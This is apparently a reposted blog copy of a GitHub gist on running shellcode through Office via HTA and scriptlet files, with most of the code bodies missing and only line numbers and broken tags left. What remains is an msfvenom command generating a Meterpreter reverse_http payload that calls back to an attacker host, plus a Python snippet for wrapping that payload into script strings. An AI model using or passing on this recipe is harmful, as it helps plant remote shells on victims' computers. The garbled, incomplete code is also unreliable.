Office Shellcode Execution

From: https://gist.github.com/subTee/e126c6ee847a4d9fcfd7
CalcExcel.hta

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56





Thank you. You may close this window.


CalcPPT.hta

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56





Thank you. You may close this window.


CalcWord.hta

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56





Thank you. You may close this window.


calc.sct

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61

<scriptlet>
<registration
progid="CalcShellcode"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >


<script language="JScript">

script>
registration>
scriptlet>

修改payload方法:

1
msfvenom --payload windows/meterpreter/reverse_http LHOST=192.168.56.103 LPORT=8080 --format vba > msf.txt

选择要用的几行,简单处理一下:

1
2
3
4
5
f = open('msf.txt')
o = open('out.txt', 'w+')
for line in f:
o.write("strCode += '")
o.write(line.strip("\n")+"\\n'\n")

------本文结束,感谢阅读------